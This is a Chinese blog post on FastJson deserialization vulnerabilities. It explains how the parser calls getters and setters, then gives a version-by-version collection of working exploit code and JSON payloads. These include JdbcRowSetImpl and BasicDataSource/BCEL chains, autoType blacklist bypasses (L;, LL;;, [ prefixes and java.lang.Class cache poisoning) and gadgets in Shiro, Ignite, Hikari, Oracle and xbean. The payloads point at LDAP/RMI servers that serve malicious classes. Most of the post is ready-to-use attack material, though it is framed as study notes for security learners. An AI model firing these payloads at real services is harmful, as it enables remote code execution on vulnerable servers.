FastJson反序列化

最新推荐文章于 2024-05-18 16:42:38 发布
最新推荐文章于 2024-05-18 16:42:38 发布
阅读量887 收藏 28
点赞数 10
文章标签: java 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73973498/article/details/137377526
版权 
{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}

 环境:

     //添加依赖
   <dependency>
            <groupId>com.alibaba</groupId>
            <artifactId>fastjson</artifactId>
            <version>1.2.24</version>
   </dependency>

 介绍:

Fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。

demo:

package FastJson;

public class Person {
    private String name;
    private int age;

    public Person(String name, int age){this.name = name;this.age = age;}

    public Person(){System.out.println("constructor");}

    public String getName() {System.out.println("getName");return this.name;}

    public void setName(String name) {System.out.println("setName");this.name = name;}

    public int getAge() {System.out.println("getAge");return this.age;}

    public void setAge(int age) { System.out.println("setAge");this.age = age;}
}
package FastJson;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;


public class test {
    public static void  main(String[] args) throws Exception{
        //第一种
        String s = "{\"param1\":\"aaa\",\"param2\":\"bbb\"}";
        JSONObject jsonObject = JSON.parseObject(s);
        System.out.println(jsonObject.getString("param1"));
        //第二种
        //String s = "{\"age\":18,\"name\":\"abc\"}";
        //Person person = JSON.parseObject(s,Person.class);
        //第三种
//        String s = "{\"@type\":\"FastJson.Person\",\"age\":18,\"name\":\"abc\"}";
//        JSONObject person = JSON.parseObject(s);

    }
}

可以看到在主函数中一共有FastJson的三种用法,也相对应有三种结果。

第一种:
aaa
第二种: 
constructor
setAge
setName
第三种:
constructor
setAge
setName
getAge
getName

可以看到FastJson在转换为对象的时候是通过getter和setter方法来实现赋值的。

其中第一种和第二种方式都没有操作空间,因为转换成的对象的类型都被确定了,不受我们客户端控制,而第三种就大有作为,是通过我们客户端传入的字符串来指定实例化对象的类型。

流程分析:

调用了parse方法,方法处理后返回的就是一个对象了,最后转换成了JSONObject类型的对象,这个类型就是一个map。进parse方法看看。

DefaultJSONParser就是对传入的字符串进行解析

在下面的parse方法中也是解析字符串,第一个字符是{,因此当作json对象解析,调用JSONObject。

这个函数中前面处理key,后面处理value,在处理key时会判断@符,有@就意味着要执行java的反序列化,类进行了loadClass加载。

这里第一步就是获取了javabean的反序列化器,然后用反序列化器进行反序列化操作。在创建类的反序列化器的时候,需要把类里面的东西进行了解,这里就通过build函数,我们再来看一下build函数。

主要就是三部分,这里我折叠了,第一for循环获得所有setter方法,第二for循环获得所有public属性 ,第三个for循环获得所有getter方法。主要通过方法名长度,方法返回值来判断getter和setter,其中getter方法有要求,返回值必须是下面之一,且没有对应的setter方法。后续就会调用这些getter和setter。

然后后面部分就会调用setter方法来讲传入的字符串中的值赋值给实例化的对象,哪些满足条件的getter方法也会调用。中间流程复杂就不讲了,直接跳到后面调用getter方法的地方。

实际上就是在toJSON的时候调用的,因为在构建对象的时候当然要通过setter方法来赋值,现在又要将对象转换成JSON,当然要用getter方法来获取对象属性的值。

然后调用getObjectWriter,与前面的desearialize相对应的,会获取所有getter方法(即使不满足前面说的返回值要是四种类型之一)。

在getFieldValuesMap中调用getter方法获取值,跟进去看看。

一路跟进最后是在get中调用了getter方法 ,这里的调用是会调用所有的getter方法的,包括哪些满足条件的getter方法就会调用两次。

链子大全:

fastjson<=1.2.24

JdbcRowSetImpl链:

条件:
RMI利用的JDK版本≤ JDK 6u132、7u122、8u113
LADP利用JDK版本≤ 6u211 、7u201、8u191
出网
分析:

这个链子很简单,只有两步。

connect方法中是标准的jndi注入,只要控制能控制this.getDataSourceName()的值,且这个connect方法在某个setter或者满足条件的getter中被调用即可。

datasource可以通过set方法kongzhi

connect方法可以通过set方法触发(get方法的返回值不是那几种)。

因此链子就通了。

poc:
package FastJson;

import com.alibaba.fastjson.JSON;

public class FastJsonjdbcrowsetimpl {
    public static void main(String[] args) {
        String s = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"DataSourceName\":\"ldap://127.0.0.1:8085/CNlBHEim\",\"AutoCommit\":\"false\"}";
        JSON.parseObject(s);
    }
}

用yakit打开一个LDAP的恶意服务器(双字节字符要关掉不然执行不了),然后执行poc即可。

BasicDataSource链 

条件:

引入tomcat依赖

 <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-dbcp</artifactId>
            <version>8.0.36</version>
        </dependency>
分析:

这个poc核心是classloader的动态类加载,在com.sun.org.apache.bcel.internal.util包下的classloader类中会判断字节流是不是以BCEL开头,是的话就会实例化这个类。

有一点需要注意在createclass中调用各类decode,所以我们传入的需要进行encode。

在BasicDataSource.createConnectionFactory()中调用了forname方法,这个方法底层就是调用classloader,然后我们向上找getter和setter方法来调用他。

BasicDataSource.createDataSource调用了createConnectionFactory()

 BasicDataSource.getConnection()调用了createDataSource(),到这一步逻辑闭环了。

 现在还需要我们能控制forname的两个参数

现在我们只需要能够控制forname方法的两个参数即可。

可以看到都能够控制。

poc:
package FastJson;

import java.io.*;
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;
import org.apache.tomcat.dbcp.dbcp2.BasicDataSource;

public class FastJsonBcel {
    public static void main(String[] args) throws Exception {
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = convert("E:\\java_security\\badfile\\hack.class");
        String code = Utility.encode(bytes,true);
//        classLoader.loadClass("$$BCEL$$"+code).newInstance();
//        BasicDataSource basicDataSource = new BasicDataSource();
//        basicDataSource.setDriverClassLoader(classLoader);
//        basicDataSource.setDriverClassName("$$BCEL$$"+code);
//        basicDataSource.getConnection();
        String s = "{\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\"DriverClassName\":\"$$BCEL$$"+ code +"\",\"DriverClassLoader\":{\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}}";

//      parseObject是先parse后toJSON,这样我们才能调用get方法:getConnection()
        JSON.parseObject(s);
    }

    private static byte[] convert(String s) throws Exception {
        File file = new File(s);
        if (!file.exists()) {
            throw new FileNotFoundException("文件未找到:" + s);
        }
        try (InputStream inputStream = new FileInputStream(file)) {
            ByteArrayOutputStream byteOutput = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            int bytesRead;

            while ((bytesRead = inputStream.read(buffer)) != -1) {
                byteOutput.write(buffer, 0, bytesRead);
            }

            return byteOutput.toByteArray();
        }
    }
}

fastjson>=1.2.24

绕过autoTypeSupport

条件:


    fastjson1.2.25-1.2.32版本:需要未开启AutoTypeSupport。

    fastjson1.2.33-1.2.47版本:
分析:

在fastjson=>1.2.25之后默认autoTypeSupport属性为false

并且多了一个checkautotype的函数,可以看到返回值是一个class,fastjson后续的版本也都是围绕这个函数来进行过滤和加载类的。使用原来的jdbc链会报错,我们来调试一下报错的过程。

 、

跟进去看看 ,这里的autoTypeSupport和expectClass默认都是null、

这里尝试从缓存中读取类(如果之前加载过这个类,就会存到缓存,后续用到的时候就会从缓存中找) ,然后直接返回,注意这里就不会经过后续的黑名单检测。

 

这个mapping属性就是缓存,存放了类名和类的类型的对应,图片只截取部分。可以看到这个操作是在静态代码块中,也就是默认执行的。这里我们要加载的类是jdbcRowSetImpl,缓存中找不到,也就返回null。

然后再autoTypeSupport为false的时候,就会进行黑白名单的检测。

然后就是在这里被检测出来从而报错。

使用黑名单外的类来rce基本不可能,我们就得想办法不经过黑名单。前面提到缓存中如果有相应的类就会直接返回,不会经过黑名单,所以我们就考虑如何往mapping中放入我们的恶意类。

可以看到在classloader中能调用put,再找loadclass再哪里调用,最后找到

这里需要class等于Class类型。

看这个类其实是一个反序列化器,后面会被放到deserializers的缓存中,以后反序列化什么类就会找到相应的反序列化器。

 

但是有个条件,要实例化成的Class类的键值必须等于val。

然后会将val键对应的值存入objVal和strVal,也就是我们的恶意类的类名

 然后loadClass传入strVal

最后放进我们的缓存。

payload:
JdbcRowSetImpl链:

还是用yakit起一个本地Ldap服务

package FastJson;
import com.alibaba.fastjson.JSON;
public class fastjsonAutotype {
    public static void main(String[] args){
        //第一步:反序列化一个Class类,值为恶意类
        //用之前payload从缓存中继续加载
        String s = "{{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"DataSourceName\":\"ldap://127.0.0.1:6666/CNlBHEim\",\"AutoCommit\":\"false\"}}";
        JSON.parseObject(s);
    }
}


String ParsePayload2 = "{" +
    "{\"@type\":\"java.lang.Class\",\"val\":\"org.apache.tomcat.dbcp.dbcp.BasicDataSource\"}:\"aaa\"," +
    "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}:\"bbb\"," +
    "{" +
        "\"@type\":\"com.alibaba.fastjson.JSONObject\"," +
            "\"xxx\":{"+
                "\"@type\":\"org.apache.tomcat.dbcp.dbcp.BasicDataSource\"," +
                "\"driverClassLoader\":{" +
                    "\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"" +
                "}," +
            "\"driverClassName\":\"$$BCEL$$...\"" +
        "}" +
    "}:\"aaa\""+
"}";
BasicDataSource链  

条件:



    此利用连版本要求比较麻烦

    1.2.25~1.2.32之间用不了BasicDataSource链

    1.2.37以上不行

package FastJson;
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;

import java.io.*;

public class fastjsonAutotype {
    public static void main(String[] args) throws Exception{
        //第一步:反序列化一个Class类,值为恶意类
        //用之前payload从缓存中继续加载
        //链1
//        String s = "{{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"DataSourceName\":\"ldap://127.0.0.1:6666/CNlBHEim\",\"AutoCommit\":\"false\"}}";
        //链2
        ClassLoader classLoader = new ClassLoader();
        byte[] bytes = convert("E:\\java_security\\badfile\\hack.class");
        String code = Utility.encode(bytes,true);
        String s = "{" +
                "{\"@type\":\"java.lang.Class\",\"val\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"}:\"aaa\"," +
                "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}:\"bbb\"," +
                "{" +
                "\"@type\":\"com.alibaba.fastjson.JSONObject\"," +
                "\"xxx\":{"+
                "\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"," +
                "\"driverClassLoader\":{" +
                "\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"" +
                "}," +
                "\"driverClassName\":\"$$BCEL$$"+code+"\"" +
                "}" +
                "}:\"aaa\""+
                "}";
        System.out.println(s);
        JSON.parseObject(s);
    }
    private static byte[] convert(String s) throws Exception {
        File file = new File(s);
        if (!file.exists()) {
            throw new FileNotFoundException("文件未找到:" + s);
        }
        try (InputStream inputStream = new FileInputStream(file)) {
            ByteArrayOutputStream byteOutput = new ByteArrayOutputStream();
            byte[] buffer = new byte[4096];
            int bytesRead;

            while ((bytesRead = inputStream.read(buffer)) != -1) {
                byteOutput.write(buffer, 0, bytesRead);
            }

            return byteOutput.toByteArray();
        }
    }
}
BasicDataSource链2:

条件:

与上面的链1适用版本不同,1.2.33~1.2.47

 String s = "{" +
                "{\"@type\":\"java.lang.Class\",\"val\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"}:\"aaa\"," +
                "{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"}:\"bbb\"," +
                "{" +
                "\"@type\":\"com.alibaba.fastjson.JSONObject\"," +
                "\"xxx\":{"+
                "\"@type\":\"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\"," +
                "\"driverClassLoader\":{" +
                "\"@type\":\"com.sun.org.apache.bcel.internal.util.ClassLoader\"" +
                "}," +
                "\"driverClassName\":\"$$BCEL$$" + code + "\"" +
                "}" +
                "}:{\"aaa\":\"bbb\"}"+
                "}";

前面部分都是autoTypeSupport为false的情况,如果开发者设置为true,那又有很多绕过,这里就不一一分析了,已经有师傅写的很全面了,这里直接放链接。

fastjson反序列化_学习 | AsaL1n's blog

FastJSON(全系漏洞分析-截至20230325) - FreeBuf网络安全行业门户

autoType=true

fastjson 1.2.25-1.2.41
分析:
if (className.startsWith("L") && className.endsWith(";")) {
    String newClassName = className.substring(1, className.length() - 1);
    return loadClass(newClassName, classLoader);
}

如果类名以L开头,;结尾,则会直接loadclass而不经过黑名单。

poc:
package FastJson;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class Lfastjson {
    public static void main(String[] args) {
        String PoC = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\", \"dataSourceName\":\"ldap://127.0.0.1:8085/yIbdwOih\", \"autoCommit\":true}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parse(PoC);

    }
}
fastjson 1.2.42
分析:

1.2.42版本将黑名单变成hashcode, 不过已经被碰撞出来了大部分https://github.com/LeadroyaL/fastjson-blacklist

1679726128_641e96300c7b0db978425.png!small?1679726128338

而在checkAutoType中

1679726133_641e96359c9034d153940.png!small?1679726133947

会对L开头;结尾的className先进行去除,然后在使用TypeUtils.loadClass(typeName, this.defaultClassLoader)加载类

这里双写L和;即可绕过

poc:
package FastJson;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class Lfastjson {
    public static void main(String[] args) {
        String PoC = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\", \"dataSourceName\":\"ldap://127.0.0.1:8085/yIbdwOih\", \"autoCommit\":true}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parse(PoC);

    }
}
Fastjson 1.2.25-1.2.43
分析:

同样在checkAutoType中,判断前两个字符不能为L,否则抛异常,可以使用[绕过

poc:
package FastJson;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class Lfastjson {
    public static void main(String[] args) {
        String PoC ="{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://127.0.0.1:8085/yIbdwOih\",\"autoCommit\":true" ;
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parse(PoC);

    }
}
Fastjson 1.2.25-1.2.45
分析:

在1.2.44中修改[符号产生的绕过

不过依然可以使用黑名单不存在的类进行绕过,不过需要存在mybatis3.x.x系列<3.5.0

<dependency>
<groupId>org.mybatis</groupId>
<artifactId>mybatis</artifactId>
<version>3.5.11</version>
</dependency>

 

poc:
package FastJson;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class Lfastjson {
    public static void main(String[] args) {
        String PoC ="{\"@type\":\"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\",\"properties\":{\"data_source\":\"ldap://127.0.0.1:8085/yIbdwOih\"}}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parse(PoC);

    }
}
fastjson1.2.47-66

在这个版本里面修复了json内置绕过,里面能够利用的漏洞主要还是一些组件漏洞。

org.apache.shiro-core-1.5.1
分析:

存在可控的lookup参数点

public T getInstance() {
      try {
          if(requiredType != null) {
              return requiredType.cast(this.lookup(resourceName, requiredType));
          } else {
              return (T) this.lookup(resourceName);
          }
poc:
package org.example.fastjson.other;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class AutoCloseable {
    public static void main(String[] args){
        String poc = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://127.0.0.1:7777/evil\"}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        System.out.println(JSON.parseObject(poc));
    }
}
br.com.anteros.dbcp.AnterosDBCPConfig
分析:
private Object getObjectOrPerformJndiLookup(Object object)
  {
     if (object instanceof String) {
        try {
           InitialContext initCtx = new InitialContext();
           return initCtx.lookup((String) object);
        }
        catch (NamingException e) {
           throw new IllegalArgumentException(e);
        }
     }
     return object;

 传递的参数是metricRegistry进入到lookup中,参数可以控制

poc:
package org.example.fastjson.other;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class metricRegistry {
    public static void main(String[] args) {
        String poc ="{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"ldap://127.0.0.1:8080/evil\"}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parseObject(poc);
    }
}
org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup
分析:

jndiNames可控导致注入

poc:
package org.example.fastjson.other;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class metricRegistry {
    public static void main(String[] args) {
        String poc ="{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\",\"jndiNames\":\"ldap://127.0.0.1:8080/evil\"}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parseObject(poc);
    }
}
com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig
分析:
public void setProperties(Properties props) throws SQLException, TransactionException {
   String utxName = null;
   try {
     utxName = (String) props.get("UserTransaction");
     InitialContext initCtx = new InitialContext();
     userTransaction = (UserTransaction) initCtx.lookup(utxName);
   } catch (NamingException e) {
     throw new SqlMapException("Error initializing JtaTransactionConfig while looking up UserTransaction (" + utxName + ").  Cause: " + e);
   }
 }

参数可以控制 

poc:
 
package org.example.fastjson.other;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class metricRegistry {
    public static void main(String[] args) {
        String poc =" {\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"ldap://127.0.0.1:8080/evil/\"}}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        JSON.parseObject(poc);
    }
}
Fastjson =1.2.50
{
    "@type":"java.lang.AutoCloseable",
    "@type":"oracle.jdbc.rowset.OracleJDBCRowSet",
    "dataSourceName":"ldap://localhost:1389/test",
    "command":"a"
}
Fastjson1.2.50-1.2.59

需要开启AutoType

{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:1389/Exploit"}
{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:1389/Exploit"}
Fastjson1.2.50-1.2.60

无需开启autotype

{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}
Fastjson1.2.50-1.2.61

开启autotype

{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://10.10.20.166:1099/ExportObject"}
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://10.10.20.166:1389/ExportObject"}
 
Fastjson <=1.2.62

利用条件:

  • 需要开启AutoType
  • 目标服务端需要存在xbean-reflect包

利用载荷:

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}
{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://localhost:1389/Exploit"}, "namespace":""}
Fastjson <=1.2.67

利用条件:

  • 开启AutoType

  • JNDI注入利用所受的JDK版本限制

  • org.apache.shiro.jndi.JndiObjectFactory类需要shiro-core和slf4j-api依赖

  • org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup类需要ignite-core、ignite-jta和jta依赖

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", "jndiNames":["ldap://localhost:1389/Exploit"], "tm": {"$ref":"$.tm"}}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://localhost:1389/Exploit","instance":{"$ref":"$.instance"}}

 

M0no10gue
关注
  • 10
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Fastjson反序列化
Christ1na的博客
11-15 9651
fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。fastjson是目前java语言中最快的json库,其功能完备且使用简单,因而使用非常广泛。自fastjson在1.2.24版本爆出第一次漏洞到至今,有着多次的安全补丁更新和绕过。
Javaweb安全——Fastjson反序列化利用
weixin_43610673的博客
10-13 4200
JSON.parseObject 的底层调用的还是 JSON.parse 方法,只是在 JSON.parse 的基础上做了一个封装。在JSON序列化时开启 SerializerFeature.WriteClassName 选项,序列化出来的结果会在开头加一个 @type 字段,值为进行序列化的类名。反序列化时带有@type 字段的序列化数据会得到对应类型的实例化对象。漏洞的还是Fastjson的功能,此功能可以反序列化的时候人为指定类,然后在利用指定的反序列化器过程中,如果满足条件则会去反射调用方法,以串联
FastJson反序列化分析
m0_49443776的博客
11-19 4002
本文主要针对FastJson反序列化过程进行详细分析,以及poc案例分析,留作学习笔记,以供日后复习
FastJSON】使用serializeUsing定制序列化、反序列化
HakuMaster的博客
10-21 2691
尽量不要使用自定义序列化,除非万不得已,优先考虑使用注解过滤,别名等方式,甚至是重新建一个VO类来组装实际需要的属性。在fastjson 1.2.16版本之后,JSONField支持新的定制化配置serializeUsing,可以单独对某个类的某个属性定制序列化、反序列化。如果只是序列化发出去(响应)的是JSON数据、传过来(请求)的数据格式跟JSON无关或者是标准的,此时自定义序列化就无所谓了,反正是要接收方来处理。反序列化可能出错,因为对应不上原来的属性了。对于新手来说,自定义序列化是一切罪恶的根源。
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan一个简单的Fastjson反序列化检测burp插件我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说...
fastjson反序列化利用
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有...
SpringBoot Redis配置Fastjson进行序列化和反序列化实现
10-16
主要介绍了SpringBoot Redis配置Fastjson进行序列化和反序列化实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
LeetCode刷题(七)——递归思维+滑动窗口
Eve12345678的博客
07-31 599
Day10 2020.07.31 1.reverse-string 编写一个函数,其作用是将输入的字符串反转过来。输入字符串以字符数组 char[] 的形式给出。不要给另外的数组分配额外的空间,你必须原地修改输入数组、使用 O(1) 的额外空间解决这一问题。你可以假设数组中的所有字符都是 ASCII 码表中的可打印字符。 解法一:双指针 class Solution{ public: void reverseString(vector<char>& s) {
fastjson使用(四) -- 反序列化
随遇而安的博客
01-05 9443
阿里开源JSON库fastjson的使用。
Fastjson2基础使用以及底层序列化/反序列化实现探究
氷泠
02-19 5619
Fastjson2相关探究
【教程】fastjson升级,spring boot设置fastjson2做序列化反序列化
m0_67394006的博客
07-31 4440
项目地址为什么要升级?官方给出的对比fastjson2并非常规升级,可以说是一次重构。fastjson2更快,更安全。
java alibaba fastjson自定义序列化反序列化(教你解决问题思路)
HumorChen的博客
12-09 2293
然后看当前目录这边可以看到上面有个Serializer包,是序列化器的,点进去看,这些好的东西分类存的是十分规范的,所以很好找 往下翻阅,可以看到有ObjectSerializer或者ObjectWritter的东西,点进去看源代码上的注释 自定义的示范代码如下,他定义了个ResultCode类,然后定义了他的序列化器类ResultCodeSerilaizer,实现了对象序列化接口ObjectSerializer ,然后自定义逻辑对这个对象进行序列化,他是直接写入ResultCode的int类型的valu
fastJson序列化与反序列化
qq_43663493的博客
10-05 2303
Java泛型是jdk1.5引入的一个新特性。泛型的本质是参数化类型,也就是说操作的数据类型被指定为一个参数。
【springboot进阶】springboot集成fastjson(二)自定义序列化/反序列化
热门推荐
06-15 1万+
介绍fastjson2如何使用自定义序列化和反序列化,配合日常接触的场景举例代码中如何实现,如日期型转化为毫秒数、单位元转分等。
jar包增量更新分析
junlaiyan的专栏
05-16 263
借助jdeps分析出jar包的增量文件
SpringBoot接入Knife4j接口文档
最新发布
博主是个二次元死肥宅~
05-18 694
Knife4j是Java MVC框架集成Swagger生成Api文档的增强解决方案,前身是swagger-bootstrap-ui。
fastjson反序列化
07-27
Fastjson中,反序列化就是将JSON字符串转换为Java对象的过程。 要进行Fastjson反序列化,首先需要将JSON字符串作为输入,然后使用Fastjson提供的API将其转换为Java对象。以下是一个简单的示例代码: ```java ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值